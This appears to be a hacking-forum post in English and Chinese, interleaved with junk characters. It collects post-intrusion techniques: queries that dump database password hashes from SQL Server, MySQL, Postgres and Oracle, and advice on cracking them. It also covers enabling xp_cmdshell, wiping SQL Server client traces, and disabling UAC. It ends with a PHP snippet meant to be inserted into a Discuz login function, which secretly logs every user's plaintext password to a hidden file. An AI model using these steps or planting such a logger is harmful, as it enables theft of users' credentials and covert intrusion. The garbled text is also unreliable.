" l- B( ^1 i! l# \3 j% l1.sql server2000/ J F) @" ^1 c+ { |# u' {
SELECT password from master.dbo.sysxlogins where name='sa'
/ j, P4 a1 L l0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED2503413 H- h8 D5 y/ S% R5 g/ Z% D
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A
# J0 a! q9 P% @9 Z$ u
I$ l& j" r- [: B2 b1 e. n; e0×0100- constant header0 P( }2 [+ c! P* Q1 P* B
34767D5C- salt) J4 b, m+ B" @1 O' [% N% x
0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash
W% T- {0 m% q4 \; ^' w3 C2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash
$ D8 k+ }2 Y2 C* kcrack the upper case hash in ‘cain and abel’ and then work the case sentive hash7 C4 T3 O2 h7 F* A+ R) c) S- Y
SQL server 2005:-# K) J7 z2 D8 K! C
SELECT password_hash FROM sys.sql_logins where name='sa'$ v8 j" D" ^( b
0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F
7 P: p+ k# _$ D" X) Y0×0100- constant header
8 i" v+ r7 T1 s9 `$ q6 \8 w/ U, e- j993BF231-salt" @) _* s! B) q$ r' I; {9 j( E
5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash
- b/ c" v) f+ H$ o( j7 Gcrack case sensitive hash in cain, try brute force and dictionary based attacks.& ]& k) p% x) F2 G4 N. T' }- g1 n3 J
& [8 q7 q9 W9 m4 G6 M, c% G
update:- following bernardo’s comments:-
7 q! [, a8 A0 a; cuse function fn_varbintohexstr() to cast password in a hex string.* Q( g7 R- g/ C! H* [5 ` m
e.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins
1 r- s) X I/ H8 c" x* A$ b( \9 c# _+ K% P' R3 [1 V
MYSQL:-
* b9 E( g6 D4 {1 q: w
6 d, }1 K4 l T7 z h1 AIn MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.
0 o0 E1 J+ n B$ K! B% m9 n- ]* ^2 d5 I+ I
*mysql < 4.1& j* e& }% m( Y$ |- Y
- p$ O& ?* T4 t5 x0 k4 j u3 A* Kmysql> SELECT PASSWORD(‘mypass’);& O0 F/ M0 j' q+ C
+——————–+
, U* U+ _/ }6 K' V1 ?( B| PASSWORD(‘mypass’) |8 W# @; X4 ?3 J$ N4 ]
+——————–+
0 q7 Q% ?) b/ r8 e/ ~| 6f8c114b58f2ce9e |7 ^: H$ O5 I" J- m- U
+——————–+
% q. z7 z& c( G) [- f5 `5 j
8 k( k K' K( X4 O- m& A' E. j*mysql >=4.1
' ^. D+ e' S; Z* b, a+ R1 T$ {8 k/ W
mysql> SELECT PASSWORD(‘mypass’);% z* k X( ~! O4 W4 r9 _# R. a8 B
+——————————————-+* V$ R1 n7 Y3 r" ~4 ^
| PASSWORD(‘mypass’) |8 c3 a3 Z' F+ ~7 D
+——————————————-+
( k ]7 l; P/ j# [: _+ `# ^3 h7 o" D| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |8 K- j& V7 u' o
+——————————————-+
$ }1 m0 W" Y# z7 F9 l4 l4 A
% G: R1 W8 Z6 a: Z6 | xSelect user, password from mysql.user: m2 q" J+ ^; G2 Y' @* U; _
The hashes can be cracked in ‘cain and abel’
; Q5 b, C4 }) e7 Y( _
. r+ n0 a+ [, i, mPostgres:-
. Y% Y7 c- y% j( H7 KPostgres keeps MD5-based password hashes for database-level users in the pg_shadow table. You need to be the database superuser to read this table (usually called “postgres” or “pgsql”). k5 g+ C3 a" U9 \- w- I
select usename, passwd from pg_shadow;0 T4 ^+ o; q# g2 X2 d( W- |3 {
usename | passwd
# }0 |' A5 I) P, r* j9 F: K, a L——————+————————————-
; n p _5 ~$ T" K$ J1 A" atestuser | md5fabb6d7172aadfda4753bf0507ed43964 U. m$ N2 i6 c/ o
use mdcrack to crack these hashes:-
6 Y; O$ c) R d* j5 y$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed4396
. X% M' F4 e d- T* ]5 z5 ]* s x( g! \' ?
! A; L0 B# j! N% a) `4 E0 ^Oracle:-
3 T8 u% S. N* l8 }" Zselect name, password, spare4 from sys.user$; P) n% H) ^0 j; _; ]- o- f, T
hashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g
8 h6 x0 u) p2 T9 Q0 \& ~1 m+ UMore on Oracle later, i am a bit bored….0 {% g3 d9 j. w( U" w8 L: }
" T- ]; g0 Y$ y6 B: H+ W' [
) p; a& A( g. U: O# {; o: i在sql server2005/2008中开启xp_cmdshell9 e- y! Z' {! H
-- To allow advanced options to be changed.
8 C: L; j* z. oEXEC sp_configure 'show advanced options', 16 ?+ `0 Z3 {+ x4 `; P# |9 ?
GO# m @! W5 y u+ p0 h& s4 p& L
-- To update the currently configured value for advanced options.
& p) d+ v: E7 sRECONFIGURE
1 O( [- k1 p, ?+ w6 Z; T! r6 bGO
{: u# @8 v3 F. `7 _* k-- To enable the feature.& c T: L z I5 i, y8 j
EXEC sp_configure 'xp_cmdshell', 1, ~ U5 z+ I# E9 ^! L7 P
GO
4 }1 X" C( r4 R, ~-- To update the currently configured value for this feature.
# _& H& Z( d6 J- j+ qRECONFIGURE8 E6 I$ m V5 c8 R
GO& C' \6 m6 q4 U, ?: I: r
SQL 2008 server日志清除,在清楚前一定要备份。
8 P' W$ ~! f: B$ K# ? ~% q如果Windows Server 2008 标准版安装SQL Express 2008,则在这里删除:
4 b2 S' r1 E+ p9 sX:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin) E1 {2 [2 e5 Y3 I6 v
# F, e J# p: L/ ?% o
对于SQL Server 2008以前的版本:
' W6 U+ M2 |/ s( u! P0 j9 YSQL Server 2005:
2 ?4 C: f. C7 F6 Q- V- P9 P1 Q删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat0 E% @' d" w4 n
SQL Server 2000:
9 ~( B$ l) I4 E% k9 a3 b清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers\相应的内容即可。
3 K0 m) X" o: O1 r
' D# n+ [; H Y+ J) ?0 W* q" a本帖最后由 simeon 于 2013-1-3 09:51 编辑
$ j. h8 }2 u1 M h
! ]6 V4 N; o- ], E5 C0 J/ S. O; F3 _" B }! p# U7 \; j
windows 2008 文件权限修改
% z3 \5 a& U2 l3 P2 h2 V" c1.http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx a3 W) [9 n. d6 L* c
2.http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad98
" m S4 q8 t# I一、先在右键菜单里面看看有没有“管理员取得所有权”,没有“管理员取得所有权”,
; P! B0 I. g1 }- v ~7 c; |* P% D" h4 D* G( b1 K
Windows Registry Editor Version 5.00. j4 x( N7 \" ]
[HKEY_CLASSES_ROOT\*\shell\runas]
, [) `- W- [, R+ k/ g2 o7 @; `@="管理员取得所有权"
. q; f. u! K( H"NoWorkingDirectory"=""9 J o' \( L/ U. I; j+ P6 @) i) X E* ?
[HKEY_CLASSES_ROOT\*\shell\runas\command]
! S% R1 d6 U2 H@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
9 R! X8 _# `/ n1 g3 V6 |"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
P& ?0 R1 z+ |2 u[HKEY_CLASSES_ROOT\exefile\shell\runas2]( L, o2 A# u9 h* z( k3 [- [4 Z0 J
@="管理员取得所有权"% K) `, k; w7 @, f' S J- I- M
"NoWorkingDirectory"=""$ t: A% T$ `* \
[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]9 v; U. j; b3 [/ x
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
" H" r& G# I. Y# R5 h- w7 Q5 F"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"' d' t$ p' m0 S& q% A
- _/ Z6 g4 x2 \4 v% @$ e8 }
[HKEY_CLASSES_ROOT\Directory\shell\runas]0 H/ I* Y( e1 P( R$ D9 D. B
@="管理员取得所有权"1 W7 H% K% F! F+ }8 x' @% m* b# t
"NoWorkingDirectory"="": d8 }" |' F4 Y) p- B# x
[HKEY_CLASSES_ROOT\Directory\shell\runas\command]
0 e: h! X1 |3 N8 }. u@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
( A. l4 ~$ c9 N"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"0 r' b$ ]' K: Q1 L! U) ~
$ B0 A( u7 i$ E8 L, F
- G: A. u" y2 {1 N9 _# p/ f) pwin7右键“管理员取得所有权”.reg导入
" Z& k, P' H: ]4 m; [二、在C:\Windows目录里下搜索“notepad.exe”文件,应该会搜索到四个“notepad.exe”和四个“notepad.exe.mui”,- H; q# s( N6 O4 b3 c7 F* k
1、C:\Windows这个路径的“notepad.exe”不需要替换) X% G* D1 _& N* P# I
2、C:\Windows\System32这个路径的“notepad.exe”不需要替换
/ D+ V$ _$ |' O1 T8 U! }# B4 }3、四个“notepad.exe.mui”不要管
5 a: \4 G3 S7 R' C. @. T6 a4、主要替换C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4和' A; y& D) ]( n
C:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a两个文件下的“notepad.exe”8 e5 Y+ {2 K5 y0 ~1 E: M O
替换方法先取得这两个文件夹的管理员权限,然后把“Notepad2.exe”重命名为“notepad.exe”替换到这两个文件夹下面,
6 i, y: T( M" ^# G. C* [替换完之后回到桌面,新建一个txt文档打开看看是不是变了。1 k. G/ K5 c8 s* Y ^# L* n
windows 2008中关闭安全策略:
; r3 |; @/ b p7 lreg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f" b, H7 I* h2 E) y8 H
修改uc_client目录下的client.php 在
. `4 L2 |) [: d$ `& tfunction uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {
1 t8 Y* X+ C" d$ p下加入如上代码,在网站./data/cache/目录下自动生成csslog.php
9 b* i5 V- y- k& t/ l* |$ e你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw
/ Q4 H( o: j6 Y" b* w$ mif(getenv('HTTP_CLIENT_IP')) {
+ n# @8 L2 P y; T- y$onlineip = getenv('HTTP_CLIENT_IP');) a) @( i1 Y# }8 X" z- R
} elseif(getenv('HTTP_X_FORWARDED_FOR')) {
2 {) P5 s; P* s1 C2 S& N: V ?. Z$onlineip = getenv('HTTP_X_FORWARDED_FOR');
& O: f; b/ e0 \7 U# ^+ S7 ~. W} elseif(getenv('REMOTE_ADDR')) {6 w6 f2 B7 p% z2 \: X& u
$onlineip = getenv('REMOTE_ADDR');
% ]4 {- ?& L, Q} else {1 f! h! p# Q% U' S
$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];
2 m' R5 u& i& m; m! V( X, K4 X} X2 f6 I1 C- L3 ?: o! S# k7 {" h
$showtime=date("Y-m-d H:i:s");4 T* x& d( q& ?+ J9 O
$record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";
3 @) F) V+ P, X $handle=fopen('./data/cache/csslog.php','a+');7 p4 F! s# Z' {: o( p% Y7 _
$write=fwrite($handle,$record); |
发表于 2013-2-27 21:24:42
收藏
支持
反对